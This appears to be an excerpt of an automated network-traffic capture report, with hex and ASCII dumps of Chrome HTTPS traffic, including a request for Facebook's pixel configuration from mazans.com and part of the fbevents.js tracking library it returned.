                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC16384INData Raw: 61 84 af 71 5d e3 35 48 67 56 17 a4 e3 1e 86 76 bb 5d 54 ac 57 60 ad 56 14 ca f7 ca 64 72 75 ba 03 a6 11 24 70 ce 05 19 da f0 4a 7d be a5 c8 17 8e 69 b5 15 f4 a3 f0 aa da 97 b8 3f e0 8b d6 37 61 bd 80 0f 71 e9 a0 5b ee f3 96 d5 bd 83 5f 63 41 35 a6 c9 a6 35 ae f5 ef 86 60 a8 76 08 2f 24 a4 d2 b8 4e 9b e5 70 24 af 5d d0 c3 c9 4a 4d d5 1f 1f b8 90 af 9d d8 c6 a8 fc 51 0f 7a 54 12 a7 67 d5 e0 01 d1 ae fe 2e 1c b7 e0 b7 ff 0c ab 1d 31 dd 35 ba ed 09 f9 6e d9 66 8c 81 f3 42 6e 08 28 48 8d dd cd 34 7f 86 86 44 68 e6 03 9c bf 30 99 0c e3 55 12 3d da 3e be 7b 8d ac d2 b2 94 af 1d 72 88 cf e7 22 8c f1 0e 9c ff e6 e9 f8 bf ce bf 83 8e e2 7f de 8a ab a9 17 18 27 84 f3 6e 9b da 3b eb b9 e1 06 f4 07 3f 8b 70 80 68 28 05 e7 1d 8b 2f fc 1b 8a 9d d3 36 09 54 da 7a 89 77
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: aq]5HgVv]TW`Vdru$pJ}i?7aq[_cA55`v/$Np$]JMQzTg.15nfBn(H4Dh0U=>{r"'n;?ph(/6Tzw
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC15990INData Raw: fe 60 ec a1 83 d2 fa 02 93 1d b2 b0 2f 96 32 36 8b c4 7d 67 33 a0 99 97 b5 13 9a 1a b1 4b 45 91 b4 07 c9 55 99 68 45 48 9d 2e a5 84 fa 12 d6 05 95 83 0d 96 08 aa 22 c0 7e 5a 11 58 db 64 7e ca bd 34 8a fb 78 f6 89 91 04 6c d2 f7 63 13 93 0e 63 d8 e8 78 4a 02 2b 6c 76 86 ad d4 81 e5 e8 e8 ad d4 ad 6d a5 ee 4c 5b 69 44 ea c9 fa 09 a9 1e 79 2c 04 ca e8 36 a1 0c 1f 12 98 04 05 16 77 a3 86 7b 20 f4 05 54 ab 99 f7 14 64 de c3 c8 bc e7 98 85 dd 58 86 53 19 ff 7d e7 f4 b6 c1 51 7e be c6 08 38 e7 8a 63 5e df 61 91 38 59 34 74 07 44 bf 8c 67 c0 77 ae f7 22 d3 94 06 36 81 57 16 b9 df eb 0d ab f8 10 7a cf 9b 32 53 02 90 dd 9f e8 73 b9 66 8b 6d 9b 13 cb 6b d2 34 e7 15 16 28 b8 d7 fc 61 2c 2c e2 61 2c 2d e4 e6 53 3d 31 60 bf b8 38 bc c7 2c 5b 41 55 02 50 3d 1c d9 b1 1c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: `/26}g3KEUhEH."~ZXd~4xlccxJ+lvmL[iDy,6w{ TdXS}Q~8c^a8Y4tDgw"6Wz2Ssfmk4(a,,a,-S=1`8,[AUP=
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC2442INData Raw: c9 1d c8 23 23 50 86 81 fa 86 f0 9f 3f eb f2 33 81 6e ec 5a f2 43 3f 2e 6b 7e e8 f6 c4 2d 77 d3 ed 69 96 3e 1a dd e4 b9 32 48 18 e5 d2 97 c7 eb 11 e9 dd 74 ca d3 4a 45 30 c1 bb 18 03 6a c1 15 86 4e 3d 68 79 52 23 78 f0 c3 1c ec 13 a0 9a e6 f0 ae 23 43 78 4e 34 cd 8b a1 88 6d 24 c6 3b ca 45 cc 81 15 6e 9e 3d 3f 2f 08 21 23 26 a8 40 5b 11 4a 9d 5a dc a7 4f 90 9e 0f 0f b5 31 c1 bd c5 df ad 01 fe 2e d1 b2 0b e6 53 a2 5c 4a 80 20 1c 45 2b 8f c0 73 2b 5c 62 f5 31 e3 93 db 50 6b cf 7a b2 78 5b d6 5f 07 36 e6 02 88 b6 c0 d6 4d fa 4c 72 4b 8c 0b 91 e1 94 4a 25 2e cb b9 b8 4c bf e2 55 31 3a 26 37 c9 05 28 76 09 7c 23 49 f2 2c 2c dc a5 18 21 93 4c 27 7d 71 21 24 93 2e a0 6e 44 98 61 b8 a9 01 5e 7d 7b 3f 33 5c 12 7d 50 69 11 1e 81 35 67 b0 e6 cd 81 be cc b5 35 6f 59
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ##P?3nZC?.k~-wi>2HtJE0jN=hyR#x#CxN4m$;En=?/!#&@[JZO1.S\J E+s+\b1Pkzx[_6MLrKJ%.LU1:&7(v|#I,,!L'}q!$.nDa^}{?3\}Pi5g5oY
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC16384INData Raw: 7c 52 c6 1f cb f8 73 19 bf 9e 9c 71 1a 8d 8d 75 44 72 a2 66 69 b0 c2 a8 af f9 7e 23 94 94 c5 65 6b 23 4f d2 18 33 6a 16 f0 ef 4e 9e 00 a4 5a 5b 6b 47 c7 e7 3b fb fb bf 9d 1c 9c 6f ee ae 6d ef 9c 1f 6e be da 7c 97 3c 3d ed 3c f9 ba f6 e4 8f a5 27 3f 2d 9e 3f 39 0b 57 db ff ed e1 3f 5e 2c 3d fc c7 b3 ef 5f 2c 45 4f e3 49 8e d7 df 82 23 a7 38 6b 6f 94 7e f8 93 c8 ee 2f f2 e4 86 4f 4a 2f 2a f7 83 5b c0 0a b3 e9 2d 34 ab 3f 38 1c 98 09 93 d2 21 e1 70 4f 73 e4 8f bf 38 3f fe b1 45 62 f7 b5 ac b7 66 e5 95 a4 22 fc ee da c1 98 f6 94 40 1c df 99 f8 aa 69 c9 79 04 cc 2c 5a 99 84 20 e6 b4 0a 4c e2 09 8c ec 1c a6 ab c1 e6 75 27 1d 04 ed 60 7d 3d 30 ac c5 c7 2a c0 95 02 10 0f 73 6a 2c 50 9b 5e 18 cb c2 79 a6 13 b4 b8 30 63 9c d6 56 47 84 b7 72 cb 79 17 49 04 64 22 33
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: |RsquDrfi~#ek#O3jNZ[kG;omn|<=<'?-?9W?^,=_,EOI#8ko~/OJ/*[-4?8!pOs8?Ebf"@iy,Z Lu'`}=0*sj,P^y0cVGryId"3
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC16384INData Raw: 73 d9 3d e8 1e 02 96 71 06 70 46 e1 3a 74 67 6a d3 e8 53 26 61 2a c7 81 b3 60 03 19 0d 91 67 47 69 c8 75 af 6c 3c 65 ec 01 ee 4f 38 4a 6a 1c fa b9 95 24 5f 81 1d 90 99 10 0d f0 c8 1b 42 b3 ec c9 cb e5 4f 25 34 5e 6a 6b 59 89 04 a0 b7 7c 16 4e 92 20 ca ef 59 cb b7 fc 09 5a 16 3f 45 2c 53 09 c7 d8 0d 4b 38 66 8b e1 98 99 9e ff 4b c0 91 d0 e5 ff 07 e4 7c 40 d6 66 e2 3c 0b 4d bb 8a 4a 4c 6f d3 44 fa 00 64 e5 e2 2a 0b d2 e8 2a 84 9d bd ab ea 9b 72 57 35 8a d6 49 03 7d ac 48 ea d6 20 e0 d0 45 11 eb 9d 50 b5 dd b1 e7 08 f2 c6 5b e5 07 44 87 0c 14 76 e3 8a 29 98 3e 06 cd f8 60 6f 01 29 2c 73 5e 6e 18 54 f1 4c 52 c5 d7 63 e9 0a 0d 63 cb 28 5a 86 bb c2 fe ae fc db 5d 89 e2 69 01 2f d0 fa cc 07 22 e6 70 67 e9 47 94 7d 03 65 7d 77 c5 c7 12 57 45 9e 03 62 f3 bf f8 66
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: s=qpF:tgjS&a*`gGiul<eO8Jj$_BO%4^jkY|N YZ?E,SK8fK|@f<MJLoDd**rW5I}H EP[Dv)>`o),s^nTLRcc(Z]i/"pgG}e}wWEbf
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC16384INData Raw: a0 7f 96 f3 92 9a 22 56 a6 56 98 a3 de 66 cd a9 29 7a 6d 99 2d dc 97 ac 71 bf 25 6b b9 8f 93 5a 2f cb 86 69 f3 c1 83 4e 4a 3d a1 00 fd 01 de c6 d8 d7 97 b4 c6 ad fe 63 df 2a 3e 3a c6 ba 17 04 61 cc 28 8f 54 ed 35 86 a6 df 8a f8 31 7b e0 91 59 2c 1b 35 82 ee 24 07 9d f4 ba 44 4a a4 73 4f db a4 ac 4a 9e 56 84 8f 69 15 8f 7c 6b 11 31 26 74 60 c6 29 06 12 81 53 b4 cd 66 73 1c 25 08 71 68 5c 7a 1b 0f 57 05 b4 94 37 29 74 8a 75 26 de a5 62 ba 96 89 3b 5e 80 74 1a f6 5e c2 bd 9d 21 67 72 ab c7 c2 d9 57 d9 0f a3 d5 54 01 92 91 ef 44 0a 93 92 bb 2e 22 87 e8 bf c2 48 1a 58 0e a2 17 45 96 23 f2 6f 4d 74 41 61 39 0a b8 a2 70 1e 8c e3 78 95 7b 43 a3 bd d2 76 de 2f c4 69 60 c4 6a b9 e7 05 b7 b1 7f 57 6e 03 e8 70 2c df cd 46 92 03 e9 fc 26 0e a4 cc 7d 8c 7c e2 3e be 71
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: "VVf)zm-q%kZ/iNJ=c*>:a(T51{Y,5$DJsOJVi|k1&t`)Sfs%qh\zW7)tu&b;^t^!grWTD."HXE#oMtAa9px{Cv/i`jWnp,F&}|>q
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC10463INData Raw: 0e 66 94 d9 ac cc 32 b8 ca 4a 07 06 81 21 47 6a 61 5f 30 34 ad 51 5c 59 f1 b3 a8 f8 d9 58 11 8d 47 a2 d1 90 a3 62 b0 cf c7 56 12 94 a4 83 dc 76 40 ee 1b 47 ec 37 f6 c9 d1 3f 56 8a c2 56 50 8b 7e 96 45 cb 8f 9a 2a 62 97 0f 95 61 57 a0 9a d8 d9 62 af e9 58 77 2f 6e 48 75 19 16 0d af d4 53 a1 7d 5e 7b 46 07 33 c6 aa d3 28 31 58 e9 b1 6f 48 07 8a f8 dd ec c7 1d 16 8a 58 9c 2e 3f 31 f4 23 7e 66 54 ad 37 ec 45 71 ac fc 9c 62 4f d2 6f 56 10 9b 82 a2 f5 bb a2 a7 22 75 18 a3 01 9e a6 4c 3e 3f b0 c4 1b 42 2f 4f ed b2 d4 82 fa 9c 91 38 3c 17 3e 98 1b 7e d0 89 f1 49 70 af 00 9a ae b1 1e f5 d3 87 7e 9c 35 ba d7 ea 36 9e 8b 76 b5 13 04 c3 e2 f3 c0 9c ee f8 f9 56 36 cf eb 0f 4a 17 b8 fc 62 9b 01 af b1 da 0a 36 a2 56 b0 b2 42 bc 2a bb bf 72 fe 4f 0e 08 e3 42 a3 77 3b 8c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: f2J!Gja_04Q\YXGbVv@G7?VVP~E*baWbXw/nHuS}^{F3(1XoHX.?1#~fT7EqbOoV"uL>?B/O8<>~Ip~56vV6Jb6VB*rOBw;
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC16351INData Raw: c7 87 3f 0b 2f f8 23 fe f5 2d a5 d3 a7 51 d4 dd 30 0a 6f fa 20 93 be dd dd 55 19 05 a1 3a 06 f4 9d 5a c5 e7 d9 02 3c e7 a4 2a 0f 61 76 b7 82 61 a1 31 f5 16 9b 5e 0d e3 43 e3 a5 3a 9c fc 8e 81 6c 93 cf 16 5e e1 15 e5 68 d4 4a 8a 57 37 64 2e 08 5c 29 7d b9 dd 01 10 3c 73 56 54 ce 22 72 56 84 53 57 2e b9 8f 88 96 34 39 21 06 de 2c 69 b4 4e d2 33 c7 b3 39 6a d5 f0 49 e8 8c 8a 5f c9 8f 5a d6 d8 9c 73 38 7b 72 38 18 26 b8 21 16 36 d7 5f 56 66 31 6a 73 71 71 46 9b c7 a2 cd ac c9 e3 8a 26 a9 8c 27 71 cc b3 1f 95 80 28 6d 55 47 a0 23 d1 1f 6b 5d f7 a4 ba 1d 0b c5 a0 a0 ec ad e4 75 f3 60 bf 4e a9 1d 4b 49 20 91 75 f8 8a 18 d7 08 ed db 71 89 8a 55 02 b8 4c 69 bf 71 e2 94 ef 90 6f 51 bf 83 0a 8b 4a fa 33 7b aa b2 71 5e df 9c a7 15 dc da a5 26 68 b3 96 40 2d 92 d5 be
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ?/#-Q0o U:Z<*ava1^C:l^hJW7d.\)}<sVT"rVSW.49!,iN39jI_Zs8{r8&!6_Vf1jsqqF&'q(mUG#k]u`NKI uqULiqoQJ3{q^&h@-


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          75192.168.2.1749889157.240.0.64436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC1365OUTGET /signals/config/731950963606637?v=2.9.176&r=stable&domain=mazans.com&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: connect.facebook.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                                                                                                                                          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                                                                                                                                          content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-FffnaA1p' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                                                                                                                                                                                          document-policy: force-load-at-top
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1671INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC252INData Raw: 2f 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: /*** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC16132INData Raw: 20 77 69 74 68 20 74 68 65 20 77 65 62 20 73 65 72 76 69 63 65 73 20 61 6e 64 20 41 50 49 73 20 70 72 6f 76 69 64 65 64 20 62 79 20 46 61 63 65 62 6f 6f 6b 2e 0a 2a 0a 2a 20 41 73 20 77 69 74 68 20 61 6e 79 20 73 6f 66 74 77 61 72 65 20 74 68 61 74 20 69 6e 74 65 67 72 61 74 65 73 20 77 69 74 68 20 74 68 65 20 46 61 63 65 62 6f 6f 6b 20 70 6c 61 74 66 6f 72 6d 2c 20 79 6f 75 72 20 75 73 65 20 6f 66 0a 2a 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 73 20 73 75 62 6a 65 63 74 20 74 6f 20 74 68 65 20 46 61 63 65 62 6f 6f 6b 20 50 6c 61 74 66 6f 72 6d 20 50 6f 6c 69 63 79 0a 2a 20 5b 68 74 74 70 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 70 6f 6c 69 63 79 2f 5d 2e 20 54 68 69 73 20 63 6f 70 79 72 69 67 68 74 20 6e 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: with the web services and APIs provided by Facebook.** As with any software that integrates with the Facebook platform, your use of* this software is subject to the Facebook Platform Policy* [http://developers.facebook.com/policy/]. This copyright no
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1500INData Raw: 69 6f 6e 20 67 28 61 2c 62 29 7b 69 66 28 21 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 62 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 61 2c 62 29 7b 69 66 28 21 61 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 62 26 26 28 74 79 70 65 6f 66 20 62 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 62 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 62 3a 61
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ion g(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")}function h(a,b){if(!a)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return b&&(typeof b==="object"||typeof b==="function")?b:a
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC14884INData Raw: 41 72 72 61 79 2e 66 72 6f 6d 28 63 2e 76 61 6c 75 65 73 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 61 2c 62 29 7b 61 3d 67 28 61 2c 62 29 3b 76 61 72 20 64 3d 22 22 3b 62 3d 5b 5d 2e 63 6f 6e 63 61 74 28 6a 28 61 29 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 70 61 72 61 6d 43 6f 6e 66 69 67 2e 71 75 65 72 79 2e 6c 6f 63 61 6c 65 43 6f 6d 70 61 72 65 28 62 2e 70 61 72 61 6d 43 6f 6e 66 69 67 2e 71 75 65 72 79 29 7d 29 3b 62 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 61 6d 43 6f 6e 66 69 67 2e 70 72 65 66 69 78 2c 65 3d 61 2e 70 61 72 61 6d 43 6f 6e 66 69 67 2e 65 62 70 5f 70 61 74 68 3b 61 3d 61 2e 70 61 72 61 6d 56 61 6c 75 65 21 3d 6e 75 6c 6c 3f 61 2e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: Array.from(c.values())}function h(a,b){a=g(a,b);var d="";b=[].concat(j(a)).sort(function(a,b){return a.paramConfig.query.localeCompare(b.paramConfig.query)});b.forEach(function(a){var b=a.paramConfig.prefix,e=a.paramConfig.ebp_path;a=a.paramValue!=null?a.
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1500INData Raw: 6f 6e 28 61 29 7b 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 3d 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 28 29 29 3b 72 65 74 75 72 6e 20 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 21 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 61 29 7b 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: on(a){f.__fbeventsResolvedModules[a]||(f.__fbeventsResolvedModules[a]=f.__fbeventsModules[a]());return f.__fbeventsResolvedModules[a]},f.fbIsModuleLoaded=function(a){return!!f.__fbeventsModules[a]},f.ensureModuleRegistered=function(b,a){f.fbIsModuleLoaded
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC14884INData Raw: 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 21 6f 28 61 2e 69 64 29 3f 7b 7d 3a 7b 69 61 62 3a 31 7d 7d 29 3b 67 2e 6c 69 73 74 65 6e 28 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 69 66 28 21 6f 28 62 29 29 72 65 74 75 72 6e 3b 62 3d 61 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 2b 22 5f 22 2b 44 61 74 65 2e 6e 6f 77 28 29 2b 22 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 62 3d 6c 28 62 29 3b 76 61 72 20 64 3d 63 2e 67 65 74 28 22 65 69 64 22 29 3b 69 66 28 64 21 3d 6e 75 6c 6c 26 26 64 21 3d 3d 22 22 7c 7c 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 63 2e 61 70 70 65 6e 64 28 22 61 70 63 6d 5f 65 69 64 22 2c 22 31 22 29 3b 64 3d 22 70 63 6d 5f 70 6c 75 67 69 6e 2d 73 65 74 5f 22 2b 62 3b 63 2e 61 70 70 65 6e 64 28 22 65 69 64
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: function(a,b){return!o(a.id)?{}:{iab:1}});g.listen(function(b,c){if(!o(b))return;b=a.location.origin+"_"+Date.now()+"_"+Math.random();b=l(b);var d=c.get("eid");if(d!=null&&d!==""||b==null)return;c.append("apcm_eid","1");d="pcm_plugin-set_"+b;c.append("eid
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1500INData Raw: 76 65 72 73 69 6f 6e 29 7d 63 61 74 63 68 28 61 29 7b 66 3d 21 30 2c 67 3d 61 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 65 26 26 68 5b 22 72 65 74 75 72 6e 22 5d 26 26 68 5b 22 72 65 74 75 72 6e 22 5d 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 66 29 74 68 72 6f 77 20 67 7d 7d 75 2e 73 65 74 28 71 2c 53 74 72 69 6e 67 28 62 29 29 3b 78 28 64 2c 75 2c 73 29 7d 29 5b 22 63 61 74 63 68 22 5d 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 6d 65 73 73 61 67 65 3d 22 5b 43 6c 69 65 6e 74 48 69 6e 74 20 45 72 72 6f 72 5d 22 2b 61 2e 6d 65 73 73 61 67 65 2c 6a 28 61 29 7d 29 3b 68 2e 6c 69 73 74 65 6e 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 62 3d 64 2e 67 65 74 50 69 78 65 6c 28 62 29 3b 69 66 28 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 62 3d 64 2e 70 6c 75 67 69
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: version)}catch(a){f=!0,g=a}finally{try{!e&&h["return"]&&h["return"]()}finally{if(f)throw g}}u.set(q,String(b));x(d,u,s)})["catch"](function(a){a.message="[ClientHint Error]"+a.message,j(a)});h.listen(function(b){b=d.getPixel(b);if(b==null)return;b=d.plugi
